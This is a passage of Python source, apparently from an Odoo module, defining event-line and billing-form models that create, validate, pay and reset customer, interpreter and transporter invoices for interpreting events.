# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
import pytz
from odoo import netsvc
from odoo import models, fields,api
from odoo.tools.translate import _
from odoo import SUPERUSER_ID, tools
from odoo.exceptions import UserError, RedirectWarning, ValidationError
import logging
_logger = logging.getLogger(__name__)
class event_lines(models.Model):
_name="event.lines"
def get_partner_id(self):
for rec in self:
rec.partner_id=rec.event_id.partner_id.id
@api.multi
@api.depends('event_start_date')
def _compute_weekday_billing_form(self):
for rec in self:
if rec.event_start_date:
dt = rec.event_start_date
_logger.info(">>>>>>>>>>>>>>>>>>>dt dt %s>>>>>", type(dt))
year, month, day = (int(x) for x in dt.split('-'))
ans = datetime.date(year, month, day)
_logger.info(">>>>>ans ans>>>%s>>>", ans)
rec.weekday = ans.strftime("%A")
billing_form_id=fields.Many2one('billing.form', "Billing Form Id")
name=fields.Char('Group Name', size=128, index=True)
event_id=fields.Many2one('event', "Source Event Id")
state=fields.Selection(related='event_id.state', string="State" )
user_id=fields.Many2one(related='event_id.user_id', store=True, string="User Id" )
partner_id=fields.Many2one('res.partner',compute='get_partner_id', string="Billing Customer" )
ordering_contact_id=fields.Many2one(related='event_id.ordering_contact_id', string="Ordering Contact" )
event_start_date=fields.Date(related='event_id.event_start_date', store=True, string="Event Date" )
event_start_time=fields.Char(related='event_id.event_start_time', store=True, string="Event Start Time" )
event_end_time=fields.Char(related='event_id.event_end_time', store=True, string="Event End Time" )
# 'view_interpreter': fields.related('event_id','view_interpreter', type='many2one', relation='res.partner', string='Interpreter'),
assigned_interpreters=fields.Many2many(related='event_id.assigned_interpreters', string='Interpreters')
doctor_id=fields.Many2one(related='event_id.doctor_id', string='Doctor')
location_id=fields.Many2one(related='event_id.location_id', string='Location')
language_id=fields.Many2one(related='event_id.language_id', string='Language')
patient_id=fields.Many2one(related='event_id.patient_id', string='Claimant')
event_type=fields.Selection(related='event_id.event_type', store=True, string="Event Type" )
company_id=fields.Many2one(related='event_id.company_id', string='Company')
selected=fields.Boolean('Selected?')
weekday = fields.Char(compute='_compute_weekday_billing_form', string='Weekday', store=True)
@api.multi
def select_event(self):
''' This Function select Event To be used in invoice flow '''
mod_obj = self.env['ir.model.data']
billing_obj = self.env['billing.form']
int_note = ''
for line in self:
if line.event_id and line.billing_form_id:
for interpreter in line.event_id.assigned_interpreters:
int_note = int_note + unicode(interpreter.complete_name) +':'+'<br>'+ (unicode(interpreter.billing_comment) if interpreter.billing_comment else '') +'<br>'
# for interpreter in line.event_id.assigned_interpreters:
# int_note = interpreter.billing_comment or ''
val = {
'cust_invoice_id': line.event_id.cust_invoice_id and line.event_id.cust_invoice_id.id or False,
# 'supp_invoice_id': line.event_id.supp_invoice_id and line.event_id.supp_invoice_id.id or False,
'supp_invoice_id2': line.event_id.supp_invoice_id2 and line.event_id.supp_invoice_id2.id or False,
'selected_event_id': line.event_id.id,
'job_comment': line.event_id.comment or '',
'event_comment': line.event_id.event_note or '',
'billing_comment': int_note or '',
'customer_comment': line.event_id.partner_id and line.event_id.partner_id.billing_comment or '',
'event_line_id': line.id,
'event_start_hr': int(line.event_id.event_start_hr),
'event_start_min': int(line.event_id.event_start_min),
'am_pm': line.event_id.am_pm,
'event_end_hr': int(line.event_id.event_end_hr),
'event_end_min': int(line.event_id.event_end_min),
'am_pm2': line.event_id.am_pm2,
'event_start_date': line.event_id.event_start_date,
'invoice_date': line.event_id.event_start_date,
'emergency_rate': line.event_id.emergency_rate,
}
if line.event_id.cust_invoice_id and line.event_id.supp_invoice_ids:
val['invoice_exist'] = True
else:
val['invoice_exist'] = False
# if line.event_id.cust_invoice_id and line.event_id.cust_invoice_id.state in ('draft','open','paid'):
# val['cust_invoice_state'] = line.event_id.cust_invoice_id.state
# if line.event_id.supp_invoice_id and line.event_id.supp_invoice_id.state in ('draft','open','paid'):
# val['supp_invoice_state'] = line.event_id.supp_invoice_id.state
self.write({'selected': True})
line.billing_form_id.write(val)
# billing_obj.create_invoices(cr, uid, [line.billing_form_id], context=context)
view_id = mod_obj.get_object_reference('bista_iugroup', 'view_billing_form')
res_id = view_id and view_id[1] or False,
return {
'name': _('Billing Form'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id[0]],
'res_model': 'billing.form',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'current',
'res_id': line.billing_form_id.id or False,
'flags': {'form': {'action_buttons': True, 'options': {'mode': 'edit'}}},
}
return True
class billing_form(models.Model):
_description = 'Billing form for accounting user'
_name = "billing.form"
_inherit = ['mail.thread', 'ir.needaction_mixin']
_order = "name"
@api.depends('selected_event_id','cust_invoice_state','supp_invoice_state')
def _check_invoiced_state(self):
''' Function to check Invoice State of the selected Event'''
for bill_form in self:
if bill_form.selected_event_id and bill_form.selected_event_id.event_type == 'language':
if bill_form.cust_invoice_state and bill_form.cust_invoice_state == 'paid' \
and bill_form.supp_invoice_state and bill_form.supp_invoice_state == 'paid':
bill_form.selected_event_id.write({'state': 'done'})
if bill_form.cust_invoice_state and bill_form.cust_invoice_state == 'open' \
and bill_form.supp_invoice_state and bill_form.supp_invoice_state in ('open','paid'):
bill_form.selected_event_id.write({'state': 'invoiced'})
if bill_form.selected_event_id and bill_form.selected_event_id.event_type == 'transport':
if bill_form.cust_invoice_state and bill_form.cust_invoice_state == 'paid' \
and bill_form.supp_invoice_state2 and bill_form.supp_invoice_state2 == 'paid':
bill_form.selected_event_id.write({'state': 'done'})
# print "event transport write state++++++++",write
if bill_form.selected_event_id and bill_form.selected_event_id.event_type == 'lang_trans':
if bill_form.cust_invoice_state and bill_form.cust_invoice_state == 'paid' \
and bill_form.supp_invoice_state and bill_form.supp_invoice_state == 'paid' \
and bill_form.supp_invoice_state2 and bill_form.supp_invoice_state2 == 'paid':
# print "in 1st ifffff+++++++++++++"
bill_form.selected_event_id.write({'state': 'done'})
bill_form.all_invoiced= True
@api.depends('selected_event_id','supp_invoice_ids')
def _get_interpreter_invoice_line(self):
'''Function to get all interpreter invoices's lines '''
for billing_form in self:
line_ids = []
if billing_form.selected_event_id:
for invoice in billing_form.selected_event_id.supp_invoice_ids:
for line in invoice.invoice_line_ids:
line_ids.append(line.id)
billing_form.supp_invoice_lines = line_ids
def _set_interpreter_invoice_line(self):
''' Function used to make Interpreter invoice line Editable '''
pass
@api.depends('selected_event_id','cust_invoice_id')
def _get_customer_invoice_line(self):
'''Function to get customer invoices's lines '''
for billing_form in self:
line_ids = []
if billing_form.selected_event_id:
if billing_form.selected_event_id.cust_invoice_id:
billing_form.cust_invoice_id=billing_form.selected_event_id.cust_invoice_id.id
for line in billing_form.selected_event_id.cust_invoice_id.invoice_line_ids:
line_ids.append(line.id)
billing_form.cust_invoice_lines = line_ids
def _set_customer_invoice_line(self):
''' Function used to make customer invoice line Editable '''
pass
@api.depends('selected_event_id','supp_invoice_id2')
def _get_transporter_invoice_line(self):
'''Function to get transporter invoices's lines '''
for billing_form in self:
line_ids = []
if billing_form.selected_event_id:
for line in billing_form.selected_event_id.supp_invoice_id2.invoice_line_ids:
line_ids.append(line.id)
billing_form.supp_invoice_lines2 = line_ids
def _set_transporter_invoice_line(self):
''' Function used to make transporter invoice line Editable '''
pass
@api.depends('selected_event_id','supp_invoice_ids')
def _get_interpreter_invoice_state(self):
''' Function To get the Interpreter invoice State '''
for billing_form in self:
state = []
if billing_form.selected_event_id:
for invoice in billing_form.selected_event_id.supp_invoice_ids:
state.append(invoice.state)
if 'draft' in state:
final_state = 'draft'
elif 'open' in state:
final_state = 'open'
elif 'paid' in state:
final_state = 'paid'
else:
final_state = 'Not Exist'
billing_form.supp_invoice_state = final_state
@api.depends('selected_event_id', 'cust_invoice_id')
def _get_customer_invoice_state(self):
''' Function To get the Customer invoice State '''
for billing_form in self:
state = []
if billing_form.selected_event_id and billing_form.selected_event_id.cust_invoice_id:
billing_form.cust_invoice_state = billing_form.selected_event_id.cust_invoice_id.state
@api.depends('selected_event_id', 'supp_invoice_id2')
def _get_transporter_invoice_state(self):
''' Function To get the Transporter invoice State '''
for billing_form in self:
state = []
if billing_form.selected_event_id and billing_form.selected_event_id.supp_invoice_id2:
billing_form.supp_invoice_state2 = billing_form.selected_event_id.supp_invoice_id2.state
@api.depends('cust_invoice_lines','supp_invoice_lines','supp_invoice_lines2')
def _get_gross_profit(self):
''' Function To get the Interpreter invoice State '''
for billing_form in self:
profit = 0.0
for line in billing_form.cust_invoice_lines:
profit += line.price_subtotal
for line in billing_form.supp_invoice_lines:
profit -= line.price_subtotal
for line in billing_form.supp_invoice_lines2:
profit -= line.price_subtotal
billing_form.gross_profit= profit
@api.depends('cust_invoice_id')
def _get_invoice_comment(self):
''' Function to get invoice additional note '''
for billing_form in self:
if billing_form.cust_invoice_id:
billing_form.invoice_comment = billing_form.cust_invoice_id.comment
else:
billing_form.invoice_comment= ''
def _set_invoice_comment(self):
''' Function to make invoice additional note field editable '''
for billing_form in self:
if billing_form.cust_invoice_id:
billing_form.cust_invoice_id.comment=billing_form.invoice_comment
@api.depends('selected_event_id')
def _get_customer_comment(self):
''' Function to get Customer Billing Note field '''
for billing_form in self:
if billing_form.selected_event_id and billing_form.selected_event_id.partner_id:
billing_form.customer_comment= billing_form.selected_event_id.partner_id.billing_comment
else:
billing_form.customer_comment = ''
def _set_customer_comment(self):
''' Function to make Customer Billing Note field editable '''
for billing_form in self:
if billing_form.selected_event_id and billing_form.selected_event_id.partner_id:
billing_form.selected_event_id.partner_id.billing_comment=billing_form.customer_comment
@api.depends('selected_event_id')
def _get_rubrik_comment(self):
''' Function to get Customer Billing Note field '''
for billing_form in self:
if billing_form.selected_event_id and billing_form.selected_event_id.partner_id:
billing_form.rubrik = billing_form.selected_event_id.partner_id.rubrik
else:
billing_form.rubrik = ''
def _set_rubrik_comment(self):
''' Function to make Customer Billing Note field editable '''
for billing_form in self:
if billing_form.selected_event_id and billing_form.selected_event_id.partner_id:
billing_form.selected_event_id.partner_id.rubrik=billing_form.rubrik
@api.multi
def approve_event(self):
for event_ids in self:
event = event_ids.selected_event_id
if event:
if event.partner_id and event.partner_id.order_note != True:
raise UserError(_('Selected event does not require verification'))
elif event.partner_id and event.partner_id.order_note == True:
if event.verify_state == 'verified':
raise UserError(_('This event is already verified, and can be processed for invoicing'))
elif event.verify_state == False or None:
event.write({'verify_state':'verified'})
# return {
# 'type': 'ir.actions.client',
# 'tag': 'action_warn',#action_info
# 'name': _('Notification'),
# 'params': {
# 'title': 'Notification!',
# 'text': _('Event verified successfully!'),
# 'sticky': True,
# }
# }
return self.env.user.notify_warning(
message='Event verified successfully!', title='Notification', sticky=True,
show_reload=False, foo="bar")
return True
name=fields.Char('Group Name', size=128, index=True)
job_comment=fields.Text('Job Note')
event_comment=fields.Text('Event Note')
billing_comment=fields.Text('Billing Note')
customer_comment=fields.Text(compute='_get_customer_comment', inverse='_set_customer_comment',string="Customer Billing Note")
rubrik=fields.Text(compute='_get_rubrik_comment', inverse='_set_rubrik_comment',string="Rubrik")
# 'invoice_comment': fields.related('cust_invoice_id','comment', type="text", store=True, string="Invoice Add. Note", readonly=True,),
invoice_comment=fields.Text(compute='_get_invoice_comment', inverse='_set_invoice_comment',string="Invoice Add. Note")
invoice_exist=fields.Boolean('Invoice Exist', readonly=True,default=True)
event_start=fields.Datetime("Event Start Time" )
event_end=fields.Datetime("Event End Time")
event_start_date=fields.Date("Event Date", )
event_start_hr=fields.Integer("Event Start Hours", size=2, )
event_start_min=fields.Integer("Event Start Minutes", size=2, )
event_end_hr=fields.Integer("Event End Hours", size=2, )
event_end_min=fields.Integer("Event End Minutes", size=2, )
am_pm=fields.Selection([('am','AM'),('pm','PM')],"AM/PM", )
am_pm2=fields.Selection([('am','AM'),('pm','PM')],"AM/PM", )
customer_timezone=fields.Selection([('US/Pacific','US/Pacific'),('US/Eastern','US/Eastern'),('US/Alaska','US/Alaska'),('US/Aleutian','US/Aleutian'),('US/Arizona','US/Arizona')
,('US/Central','US/Central'),('US/East-Indiana','US/East-Indiana'),('US/Hawaii','US/Hawaii'),('US/Indiana-Starke','US/Indiana-Starke'),('US/Michigan','US/Michigan')
,('US/Mountain','US/Mountain'),('US/Samoa','US/Samoa')],'Customer TimeZone',)
user_id=fields.Many2one('res.partner', "Done By")
event_id=fields.Many2one('event', "Source Event Id")
selected_event_id=fields.Many2one('event', "Selected Event Id")
event_type=fields.Selection(related='selected_event_id.event_type',string="Event Type",store=False)
event_line_id=fields.Many2one('event.lines', "Source Billing Line Id")
event_lines=fields.One2many('event.lines','billing_form_id', 'Events')
task_lines=fields.One2many(related='selected_event_id.task_id.work_ids', string='Task Lines')
event_purpose=fields.Selection(related='selected_event_id.event_purpose', string='Event Purpose')
cust_invoice_id=fields.Many2one('account.invoice','Customer Invoice')
cust_invoice_lines=fields.One2many('account.invoice.line',compute='_get_customer_invoice_line',inverse = '_set_customer_invoice_line',string='Customer Invoice Lines')
# 'supp_invoice_lines': fields.related('supp_invoice_ids','invoice_line', type='one2many', relation='account.invoice.line', string='Interpreter Invoice Lines'),
# 'supp_invoice_id':fields.many2one('account.invoice','Interpreter Invoic
# e'),
supp_invoice_lines=fields.One2many('account.invoice.line',compute='_get_interpreter_invoice_line',inverse = '_set_interpreter_invoice_line',string = 'Interpreter Invoices')
supp_invoice_ids=fields.Many2many('account.invoice','billing_inv_rel','bill_form_id','invoice_id','Interpreter Invoices')
supp_invoice_lines2=fields.One2many('account.invoice.line',compute='_get_transporter_invoice_line',inverse = '_set_transporter_invoice_line', string='Transporter Invoice Lines')
supp_invoice_id2=fields.Many2one('account.invoice','Transporter Invoice')
all_invoiced=fields.Boolean(compute='_check_invoiced_state', string = 'All Invoiced',default=False)
cust_invoice_state=fields.Char(compute=_get_customer_invoice_state,string="Customer Invoice State")
supp_invoice_state=fields.Char(compute=_get_interpreter_invoice_state,string = 'Interpreter Invoice State')
supp_invoice_state2=fields.Char(compute=_get_transporter_invoice_state, string="Transporter Invoice State")
company_id=fields.Many2one('res.company', 'Company', index=1 ,required=True,default=lambda self: self.env['res.company']._company_default_get('billing.form'))
gross_profit=fields.Float(compute='_get_gross_profit', string='Gross Profit')
invoices_created=fields.Boolean('Invoices Created')
invoice_date=fields.Date('Invoice Date')
emergency_rate=fields.Boolean('Emergency Rate')
@api.multi
def update_invoices(self):
''' Function to Update Invoices for the selected event. It recalculate the Invoice Lines '''
line_obj = self.env['account.invoice.line']
task_obj = self.env['project.task']
cur_obj = self
# code start
cust_invoice_lines=self.cust_invoice_lines
for each in cust_invoice_lines:
self._cr.execute('update account_invoice_line set total_editable =%s where id=%s', (0.0, each.id))
self._cr.commit()
supp_invoice_lines=self.supp_invoice_lines
for each in supp_invoice_lines:
self._cr.execute('update account_invoice_line set total_editable =%s where id =%s', (0.0, each.id))
self._cr.commit()
# code end
if cur_obj.selected_event_id:
if not cur_obj.selected_event_id.cust_invoice_id or not cur_obj.selected_event_id.supp_invoice_ids:
raise UserError(_('Invoice are not yet generated for this event!'))
if cur_obj.selected_event_id.cust_invoice_id:
for line in cur_obj.selected_event_id.cust_invoice_id.invoice_line_ids:
if line.task_line_id:
inv_line_data = {}
if line.task_line_id.task_for == 'interpreter':
if not line.task_line_id.interpreter_id:
continue
self=self.with_context(interpreter=line.task_line_id.interpreter_id)
inv_line_data = task_obj._prepare_inv_line_interpreter_for_customer(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
line.product_id)
elif line.task_line_id.task_for == 'transporter':
if not line.task_line_id.transporter_id:
continue
inv_line_data = task_obj._prepare_inv_line_transporter_for_customer(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
line.product_id)
line.write(inv_line_data)
for invoice in cur_obj.selected_event_id.supp_invoice_ids:
for line in invoice.invoice_line_ids:
if line.task_line_id:
inv_line_data = {}
if line.task_line_id.task_for == 'interpreter':
if not line.task_line_id.interpreter_id:
continue
self = self.with_context(interpreter=line.task_line_id.interpreter_id)
inv_line_data = task_obj._prepare_inv_line_interpreter(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
line.product_id)
elif line.task_line_id.task_for == 'transporter':
if not line.task_line_id.transporter_id:
continue
inv_line_data = task_obj._prepare_inv_line_transporter(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
line.product_id)
line.write(inv_line_data)
if cur_obj.selected_event_id.supp_invoice_id2:
for line in cur_obj.selected_event_id.supp_invoice_id2.invoice_line_ids:
if line.task_line_id:
inv_line_data = {}
if line.task_line_id.task_for == 'interpreter':
if not line.task_line_id.interpreter_id:
continue
self = self.with_context(interpreter=line.task_line_id.interpreter_id)
inv_line_data = task_obj._prepare_inv_line_interpreter(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
line.product_id)
elif line.task_line_id.task_for == 'transporter':
if not line.task_line_id.transporter_id:
continue
inv_line_data = task_obj._prepare_inv_line_transporter(line.account_id and line.account_id.id or False, line.task_line_id,line.invoice_id.event_id,
line.product_id)
line.write(inv_line_data)
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
@api.multi
def pay_invoice(self):
''' Function to Pay Invoice '''
cur_obj = self
mod_obj = self.env['ir.model.data']
res = mod_obj.get_object_reference('bista_iugroup', 'invoice_payment_wizard_view')
res_id = res and res[1] or False,
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.cust_invoice_id :
if cur_obj.selected_event_id.cust_invoice_id.state == 'open':
if self._context.get('invoice_type',False) and self._context.get('invoice_type',False) == 'customer':
if cur_obj.invoice_date:
cur_obj.selected_event_id.cust_invoice_id.write({'date_invoice':cur_obj.invoice_date})
amount = cur_obj.selected_event_id.cust_invoice_id.residual
if amount == 0.0:
amount = cur_obj.selected_event_id.cust_invoice_id.amount_total
val = {
'company_id': cur_obj.selected_event_id.cust_invoice_id.company_id and cur_obj.selected_event_id.cust_invoice_id.company_id.id or False,
'event_id': cur_obj.selected_event_id.id,
'invoice_id': cur_obj.selected_event_id.cust_invoice_id.id,
'amount': amount or 0.0,
'billing_form_id': self.ids[0],
}
self=self.with_context(invoice_id=cur_obj.selected_event_id.cust_invoice_id.id)
payment_form_id = self.env['invoice.payment.wizard'].create(val).id
return {
'name': _('Payment Form'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id[0]],
'res_model': 'invoice.payment.wizard',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'new',
'res_id': payment_form_id or False,
}
# else:
# raise osv.except_osv(_('Warning!'),_('Customer Invoice is not in open state !'))
if cur_obj.selected_event_id.supp_invoice_ids :
for supp_invoice_id in cur_obj.selected_event_id.supp_invoice_ids:
if supp_invoice_id.state == 'open':
if self._context.get('invoice_type',False) and self._context.get('invoice_type',False) == 'supplier':
if cur_obj.invoice_date:
supp_invoice_id.write({'date_invoice':cur_obj.invoice_date})
print "residual.......",supp_invoice_id.residual
amount = supp_invoice_id.residual
if amount == 0.0:
amount = supp_invoice_id.amount_total
val = {
'company_id': supp_invoice_id.company_id and supp_invoice_id.company_id.id or False,
'event_id': cur_obj.selected_event_id.id,
'invoice_id': supp_invoice_id.id,
'amount': amount or 0.0,
'billing_form_id': self.ids[0],
}
self = self.with_context(invoice_id=supp_invoice_id.id)
payment_form_id = self.env['invoice.payment.wizard'].create(val).id
return {
'name': _('Payment Form'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id[0]],
'res_model': 'invoice.payment.wizard',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'new',
'res_id': payment_form_id or False,
}
else:
continue
# else:
# raise osv.except_osv(_('Warning!'),_('Interpreter Invoice is not in open state !'))
if cur_obj.selected_event_id.supp_invoice_id2 :
if cur_obj.selected_event_id.supp_invoice_id2.state == 'open':
if self._context.get('invoice_type',False) and self._context.get('invoice_type',False) == 'transporter':
if cur_obj.invoice_date:
cur_obj.selected_event_id.supp_invoice_id2.write({'date_invoice':cur_obj.invoice_date})
# print "residual.......",cur_obj.selected_event_id.supp_invoice_id.residual
amount = cur_obj.selected_event_id.supp_invoice_id2.residual
if amount == 0.0:
amount = cur_obj.selected_event_id.supp_invoice_id2.amount_total
val = {
'company_id': cur_obj.selected_event_id.supp_invoice_id2.company_id and cur_obj.selected_event_id.supp_invoice_id2.company_id.id or False,
'event_id': cur_obj.selected_event_id.id,
'invoice_id': cur_obj.selected_event_id.supp_invoice_id2.id,
'amount': amount or 0.0,
'billing_form_id': self.ids[0],
}
self=self.with_context(invoice_id=cur_obj.selected_event_id.supp_invoice_id2.id)
payment_form_id = self.env['invoice.payment.wizard'].create(val).id
return {
'name': _('Payment Form'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id[0]],
'res_model': 'invoice.payment.wizard',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'new',
'res_id': payment_form_id or False,
}
# else:
# raise osv.except_osv(_('Warning!'),_('Interpreter Invoice is not in open state !'))
else:
raise UserError(_('No Customer Invoice is generated for this event!'))
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
@api.multi
def pay_customer_invoice(self,journal_id, amount):
''' Function to Pay Customer Invoice '''
cur_obj = self
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.cust_invoice_id :
if cur_obj.selected_event_id.cust_invoice_id.state == 'open':
cur_obj.selected_event_id.cust_invoice_id.pay_customer_invoice(journal_id, amount)
# self.write(cr, uid, ids, {'cust_invoice_state': 'paid'})
# cr.commit()
else:
raise UserError(_('Customer Invoice is not in open state !'))
else:
raise UserError(_('No Customer Invoice is generated for this event!'))
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
@api.multi
def pay_supplier_invoice(self,journal_id, amount):
''' Function to Pay Supplier Invoice '''
cur_obj = self
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.supp_invoice_ids :
for supp_invoice_id in cur_obj.selected_event_id.supp_invoice_ids:
if supp_invoice_id.state == 'open' :#and len(cur_obj.selected_event_id.supp_invoice_ids)==1
supp_invoice_id.pay_supplier_invoice(journal_id, amount)
break
# self.write(cr, uid, ids, {'supp_invoice_state': 'paid'})
# cr.commit()
# else:
# raise osv.except_osv(_('Warning!'),_('Interpreter Invoice is not in open state !'))
# elif supp_invoice_id.state == 'open' and len(cur_obj.selected_event_id.supp_invoice_ids)==2:
# self.pool.get('account.invoice').pay_supplier_invoice(cr , uid, [supp_invoice_id.id], journal_id, amount, context)
# break
# self.write(cr, uid, ids, {'supp_invoice_state': 'paid'})
# cr.commit()
elif supp_invoice_id.state == 'paid' :
continue
else:
raise UserError(_('Interpreter Invoice is not in open state !'))
else:
raise UserError(_('No Interpreter Invoice is generated for this event!'))
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
@api.multi
def pay_transporter_invoice(self,journal_id, amount):
''' Function to Pay Transporter Invoice '''
cur_obj = self
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.supp_invoice_id2 :
if cur_obj.selected_event_id.supp_invoice_id2.state == 'open':
cur_obj.selected_event_id.supp_invoice_id2.pay_supplier_invoice(journal_id, amount)
# self.write(cr, uid, ids, {'supp_invoice_state': 'paid'})
# cr.commit()
else:
raise UserError(_('Transporter Invoice is not in open state !'))
else:
raise UserError(_('No Transporter Invoice is generated for this event!'))
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
@api.multi
def reset_to_draft(self):
''' Function to Reset Customer and Supplier Invoices '''
cur_obj = self
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.cust_invoice_id:
if cur_obj.selected_event_id.cust_invoice_id.state == 'draft':
pass
elif cur_obj.selected_event_id.cust_invoice_id.state == 'open':
inv_id = cur_obj.selected_event_id.cust_invoice_id
if inv_id.move_id and inv_id.move_id.state == 'posted':
journal = inv_id.journal_id
journal.write({'update_posted': True})
inv_id.action_cancel()
inv_id.action_invoice_draft()
else:
raise UserError(_('Customer Invoice is not in open state !'))
else:
raise UserError(_('No Customer Invoice is generated for this event!'))
if not cur_obj.selected_event_id.supp_invoice_ids and cur_obj.selected_event_id.event_type in ('lang_trans','language') :
raise UserError(_('No Interpreter Invoice is generated for this event!'))
if cur_obj.selected_event_id.supp_invoice_ids:
for supp_invoice_id in cur_obj.selected_event_id.supp_invoice_ids:
if supp_invoice_id.state == 'draft':
raise UserError(_('Interpreter Invoice is not in open state !'))
elif supp_invoice_id.state == 'open':
inv_id = supp_invoice_id
if inv_id.move_id and inv_id.move_id.state == 'posted':
journal = inv_id.journal_id
journal.write({'update_posted': True})
inv_id.action_cancel()
inv_id.action_invoice_draft()
if not cur_obj.selected_event_id.supp_invoice_id2 and cur_obj.selected_event_id.event_type in ('lang_trans','transport') :
raise UserError(_('No Transporter Invoice is generated for this event!'))
if cur_obj.selected_event_id.supp_invoice_id2:
if cur_obj.selected_event_id.supp_invoice_id2.state == 'draft':
pass
elif cur_obj.selected_event_id.supp_invoice_id2.state == 'open':
inv_id = cur_obj.selected_event_id.supp_invoice_id2
if inv_id.move_id and inv_id.move_id.state == 'posted':
journal = inv_id.journal_id
journal.write({'update_posted': True})
inv_id.action_cancel()
inv_id.action_invoice_draft()
else:
raise UserError(_('Transporter Invoice is not in open state !'))
else:
raise UserError(_('Please Select the event from list first to invoice!'))
return True
@api.multi
def update_event_time(self):
''' Function to Update Actual Event Time '''
cur_obj = self
if cur_obj.selected_event_id:
cur_obj.selected_event_id.write({'actual_event_start': cur_obj.event_start,'actual_event_end': cur_obj.event_end})
# self.pool.get('event').write(cr, uid, [cur_obj.selected_event_id.id], {'actual_event_start': cur_obj.event_start,'actual_event_end': cur_obj.event_end})
return True
@api.multi
def validate_invoices(self):
''' Function to Validate Customer and Supplier Invoice '''
cur_obj = self
# wf_service = netsvc.LocalService("workflow")
if not cur_obj.selected_event_id:
raise UserError(_('Please Select the event from list first to invoice!'))
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.cust_invoice_id :
if cur_obj.invoice_date:
cur_obj.selected_event_id.cust_invoice_id.write({'date_invoice':cur_obj.invoice_date})
if cur_obj.selected_event_id.cust_invoice_id.state == 'draft':
# wf_service.trg_validate(self._uid, 'account.invoice', cur_obj.selected_event_id.cust_invoice_id.id, 'invoice_open', self._cr)
cur_obj.selected_event_id.cust_invoice_id.action_invoice_open()
# self.write(cr, uid, ids, {'cust_invoice_state': 'open'})
# else:
# raise osv.except_osv(_('Warning!'),_('Customer Invoice is already Validated!'))
else:
raise UserError(_('No Customer Invoice is generated for this event!'))
if not cur_obj.selected_event_id.supp_invoice_id2 and cur_obj.selected_event_id.event_type in ('lang_trans','transport') :
raise UserError(_('No Transporter Invoice is generated for this event!'))
if not cur_obj.selected_event_id.supp_invoice_ids and cur_obj.selected_event_id.event_type in ('lang_trans','language') :
raise UserError(_('No Interpreter Invoice is generated for this event!'))
if cur_obj.selected_event_id.supp_invoice_ids :
for supp_invoice_id in cur_obj.selected_event_id.supp_invoice_ids:
if cur_obj.invoice_date:
supp_invoice_id.write({'date_invoice':cur_obj.invoice_date})
if supp_invoice_id.state == 'draft':
# wf_service.trg_validate(self._uid, 'account.invoice', supp_invoice_id.id, 'invoice_open', self._cr)
supp_invoice_id.action_invoice_open()
# self.write(cr, uid, ids, {'supp_invoice_state': 'open'})
# else:
# raise osv.except_osv(_('Warning!'),_('Supplier Invoice is already Validated!'))
# else:
# raise osv.except_osv(_('Warning!'),_('No Interpreter Invoice is generated for this event!'))
# print "cur_obj.selected_event_id.supp_invoice_id2cur_obj.selecte",cur_obj.selected_event_id.supp_invoice_id2
if cur_obj.selected_event_id.supp_invoice_id2 :
if cur_obj.invoice_date:
cur_obj.selected_event_id.supp_invoice_id2.write({'date_invoice':cur_obj.invoice_date})
if cur_obj.selected_event_id.supp_invoice_id2.state == 'draft':
# wf_service.trg_validate(self._uid, 'account.invoice', cur_obj.selected_event_id.supp_invoice_id2.id, 'invoice_open', self._cr)
cur_obj.selected_event_id.supp_invoice_id2.action_invoice_open()
# self.write(cr, uid, ids, {'supp_invoice_state': 'open'})
# else:
# raise osv.except_osv(_('Warning!'),_('Supplier Invoice is already Validated!'))
# else:
# raise osv.except_osv(_('Warning!'),_('No Supplier Invoice is generated for this event!'))
cur_obj.selected_event_id.write({'state': 'invoiced'})
return True
@api.multi
def create_invoices(self):
''' Function to create Invoices for the selected event '''
mod_obj = self.env['ir.model.data']
cur_obj = self
inv_date = cur_obj.invoice_date if cur_obj.invoice_date else False
self=self.with_context(invoice_date=inv_date)
if cur_obj.selected_event_id:
if cur_obj.selected_event_id.cust_invoice_id or cur_obj.selected_event_id.supp_invoice_ids or cur_obj.selected_event_id.supp_invoice_id2 or cur_obj.selected_event_id.state == 'invoiced':
raise UserError(_('Invoices are already generated for this event!'))
if cur_obj.selected_event_id.task_id:
if self.ids:
self=self.with_context(billing_form=True,billing_form_id=self.ids[0])
cur_obj.selected_event_id.task_id.send_for_billing()
# self.write(cr, uid, ids, {'cust_invoice_state': 'draft', 'invoice_exist': True, 'supp_invoice_state': 'draft'})
self.write({'invoice_exist': True})
# if cur_obj.event_line_id:
# self.pool.get('event.lines').write(cr, uid, [cur_obj.event_line_id.id], {'state': 'invoiced'})
else:
raise UserError(_('No Timesheet has been Entered for the selected Event yet!'))
for billing_form in cur_obj:
if billing_form.selected_event_id.cust_invoice_id:
billing_form.cust_invoice_id = billing_form.selected_event_id.cust_invoice_id.id
else:
raise UserError(_('Please Select the event from list first to invoice!'))
view_id = mod_obj.get_object_reference('bista_iugroup', 'view_billing_form')
res_id = view_id and view_id[1] or False,
# my add
self.write({'invoices_created': True})
return {
'name': _('Billing Form'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id[0]],
